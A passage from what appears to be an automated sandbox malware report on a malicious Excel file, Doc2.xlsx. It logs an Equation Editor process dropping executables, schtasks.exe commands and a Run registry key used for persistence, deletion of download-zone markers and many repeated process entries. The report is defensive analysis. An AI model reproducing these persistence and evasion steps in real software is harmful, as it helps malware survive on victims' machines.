                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D174912_2_001D1749
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D316C12_2_001D316C
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D59DA12_2_001D59DA
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D05F912_2_001D05F9
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_001D19F812_2_001D19F8
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_00278C2012_2_00278C20
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_002778A912_2_002778A9
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_002700B012_2_002700B0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027D48812_2_0027D488
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027AD5012_2_0027AD50
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_002771E812_2_002771E8
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_00279DE812_2_00279DE8
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027939112_2_00279391
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027BC0812_2_0027BC08
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027BC1812_2_0027BC18
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027AC7712_2_0027AC77
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027D04012_2_0027D040
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_002798A812_2_002798A8
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027808812_2_00278088
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_002708F412_2_002708F4
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027AD4012_2_0027AD40
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_002771E012_2_002771E0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027CDE812_2_0027CDE8
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027EE2812_2_0027EE28
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027EE1812_2_0027EE18
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027D2A012_2_0027D2A0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027F2B112_2_0027F2B1
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027F2C012_2_0027F2C0
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027176812_2_00271768
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_00278B8012_2_00278B80
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_0027C79012_2_0027C790
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 17_2_0023592817_2_00235928
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 17_2_0023654017_2_00236540
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 17_2_00235C7017_2_00235C70
                      Source: Doc2.xlsxOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exe 3441D4122B712A32E1C0518F02903A632ECBF557FBAB71C510C732474D326CD1
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe 3441D4122B712A32E1C0518F02903A632ECBF557FBAB71C510C732474D326CD1
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\WzyRXCWtdGSdEA.exe 3441D4122B712A32E1C0518F02903A632ECBF557FBAB71C510C732474D326CD1
                      Source: Doc_87654334567[1].exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: vbc.exe.4.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@18/28@7/2
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Doc2.xlsxJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeMutant created: \Sessions\1\BaseNamedObjects\bCmLOidXVAcpgGmAXeH
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVREE54.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................`.$...............$.....(.P.....h.......p.......................................................................................Jump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................d...........E.R.R.O.R.:. ...................................................................(...............................Jump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................d...........E.R.R.O.(.P.............................$...............................................j.......................
                      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................H.!.........E.R.R.O.R.:. .............................................................................................!.....
                      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ....................H.!.........E.R.R.O.(.P.............................................................................j.................!.....
                      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Doc2.xlsxReversingLabs: Detection: 28%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
                      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp'
                      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe {path}
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe 'C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe'
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe 'C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe'
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp74F2.tmp'
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp7511.tmp'
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe {path}
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe {path}
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
                      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp'Jump to behavior
                      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe {path}Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp7511.tmp'Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe {path}Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp74F2.tmp'Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe {path}Jump to behavior
                      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\Public\vbc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                      Source: Doc2.xlsxStatic file information: File size 1239552 > 1048576
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Binary string: .pDBl source: vbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, vbc.exe, 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmp
                      Source: Doc2.xlsxInitial sample: OLE indicators vbamacros = False
                      Source: Doc2.xlsxInitial sample: OLE indicators encrypted = True

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: vbc.exe.4.dr, Utilities/YatcForm.cs.Net Code: EFEFEFEFEFEF System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_10727F11 push es; iretd 6_2_1072815A
                      Source: C:\Users\Public\vbc.exeCode function: 6_2_00319718 push esp; retf 6_2_00319719
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_10FC7F11 push es; iretd 11_2_10FC815A
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E7198 push eax; retn 0018h11_2_002E71E5
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E9718 push esp; retf 11_2_002E9719
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 11_2_002E8B80 pushad ; ret 11_2_002E8C19
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 12_2_00279718 push esp; retf 12_2_00279719
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeCode function: 17_2_10FC7F11 push es; iretd 17_2_10FC815A
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.51973544971
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.51973544971
                      Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                      Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\WzyRXCWtdGSdEA.exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Doc_87654334567[1].exeJump to dropped file
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Drops PE files to the user root directoryShow sources
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp'
                      Source: C:\Users\Public\vbc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MLdAuJump to behavior
                      Source: C:\Users\Public\vbc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run MLdAuJump to behavior

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                      Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Users\Public\vbc.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
